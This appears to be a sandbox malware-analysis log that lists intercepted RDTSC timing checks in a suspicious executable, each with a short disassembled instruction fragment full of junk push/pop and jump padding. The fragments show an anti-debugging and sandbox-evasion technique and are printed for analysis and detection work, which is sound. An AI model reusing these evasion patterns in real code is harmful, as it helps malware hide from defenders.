Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C66149 second address: C6614D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AEAE second address: C6AEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AEB5 second address: C6AECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007FBCB0ED6613h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AECA second address: C6AECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C739B0 second address: C739D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FBCB0ED65F8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730D0 second address: C730F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FBCB0E4CF73h 0x0000000b jng 00007FBCB0E4CF66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730F8 second address: C730FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730FC second address: C73133 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBCB0E4CF72h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnc 00007FBCB0E4CF66h 0x00000012 pop ecx 0x00000013 jnp 00007FBCB0E4CF74h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733B5 second address: C733BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733BE second address: C733CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jnc 00007FBCB0E4CF6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733CF second address: C733E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FBCB0ED65F8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jo 00007FBCB0ED65F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02A7D second address: C02AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FBCB0E4CF72h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02AAE second address: C02AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02AB4 second address: C02AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7C2ED second address: C7C2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7C2F1 second address: C7C2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0459A second address: C045BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0ED6609h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C045BC second address: C045DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBCB0E4CF73h 0x0000000f jnl 00007FBCB0E4CF66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB56 second address: C7CB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB5C second address: C7CB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB61 second address: C7CB7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FBCB0ED65F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB7E second address: C7CB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CC70 second address: C7CC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CD30 second address: C7CD35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81DF3 second address: C81DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81DF9 second address: C81E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80AD7 second address: C80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80ADD second address: C80AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80AE1 second address: C80AEB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCB0ED65F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81210 second address: C8121B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBCB0E4CF66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C813B2 second address: C813B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81820 second address: C81856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0E4CF6Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCB0E4CF72h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81856 second address: C8185C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8185C second address: C81862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81B59 second address: C81B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4EB9D second address: C4EBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBCB0E4CF68h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 sub edx, 50016EA6h 0x0000002c lea eax, dword ptr [ebp+12B708F4h] 0x00000032 mov dword ptr [ebp+129C291Fh], eax 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007FBCB0E4CF68h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4EBE8 second address: C34718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FBCB0ED6604h 0x00000011 nop 0x00000012 push edi 0x00000013 movzx edi, dx 0x00000016 pop edx 0x00000017 call dword ptr [ebp+129C1B9Eh] 0x0000001d pushad 0x0000001e jmp 00007FBCB0ED6602h 0x00000023 push eax 0x00000024 jbe 00007FBCB0ED65F6h 0x0000002a pop eax 0x0000002b jnp 00007FBCB0ED65FCh 0x00000031 je 00007FBCB0ED65F6h 0x00000037 pushad 0x00000038 jl 00007FBCB0ED65F6h 0x0000003e jmp 00007FBCB0ED6603h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F093 second address: C4F097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F160 second address: C4F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F1D7 second address: C4F20A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 5FCF2681h 0x0000000e jng 00007FBCB0E4CF72h 0x00000014 jl 00007FBCB0E4CF6Ch 0x0000001a add dword ptr [ebp+129C29C9h], ebx 0x00000020 call 00007FBCB0E4CF69h 0x00000025 push eax 0x00000026 push edx 0x00000027 jng 00007FBCB0E4CF68h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F20A second address: C4F229 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCB0ED65FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FBCB0ED6602h 0x00000011 jnp 00007FBCB0ED65FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F2D0 second address: C4F2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F2D4 second address: C4F2DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F94F second address: C4F967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FBCB0E4CF66h 0x00000011 je 00007FBCB0E4CF66h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F967 second address: C4F96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FAFC second address: C4FB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FDD7 second address: C4FE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007FBCB0ED6602h 0x0000000d je 00007FBCB0ED65FCh 0x00000013 jbe 00007FBCB0ED65F6h 0x00000019 nop 0x0000001a adc ch, FFFFFFD4h 0x0000001d lea eax, dword ptr [ebp+12B70938h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FBCB0ED65F8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov dx, 9BA0h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FBCB0ED6602h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FE36 second address: C4FE3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C16E2F second address: C16E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6601h 0x00000009 jnl 00007FBCB0ED65F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C85B11 second address: C85B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FBCB0E4CF79h 0x0000000a push esi 0x0000000b jl 00007FBCB0E4CF66h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FBCB0E4CF72h 0x0000001b push ecx 0x0000001c jc 00007FBCB0E4CF66h 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C85FE0 second address: C85FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C85FE4 second address: C85FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8B5FE second address: C8B63D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBCB0ED6605h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FBCB0ED6607h 0x00000014 jmp 00007FBCB0ED65FAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8B63D second address: C8B645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8B645 second address: C8B649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8B649 second address: C8B65A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FBCB0E4CF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8AE0F second address: C8AE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8AE14 second address: C8AE19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8AE19 second address: C8AE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BBEB second address: C8BC04 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBCB0E4CF6Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BC04 second address: C8BC40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FBCB0ED6605h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007FBCB0ED6621h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007FBCB0ED6601h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BD8F second address: C8BD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BD98 second address: C8BD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BD9E second address: C8BDBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF72h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8BDBC second address: C8BDCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCB0ED65F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C153CD second address: C153D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C153D3 second address: C153D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C153D7 second address: C15412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCB0E4CF78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FBCB0E4CF6Ch 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBCB0E4CF6Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C15412 second address: C1541C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C918C3 second address: C918C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C918C7 second address: C918D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FBCB0ED65F6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91A29 second address: C91A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91A45 second address: C91A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91A4B second address: C91A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91A59 second address: C91A77 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jnc 00007FBCB0ED65FCh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91D62 second address: C91D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBCB0E4CF66h 0x0000000a popad 0x0000000b jmp 00007FBCB0E4CF73h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91E7E second address: C91E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91E84 second address: C91E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91E8D second address: C91E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91E92 second address: C91E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBCB0E4CF66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91E9D second address: C91EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91EA5 second address: C91EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FBCB0E4CF72h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C91EB8 second address: C91ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBCB0ED65F6h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FBCB0ED65FEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C92197 second address: C9219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9219B second address: C9219F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9219F second address: C921AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FBCB0E4CF66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C921AF second address: C921B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
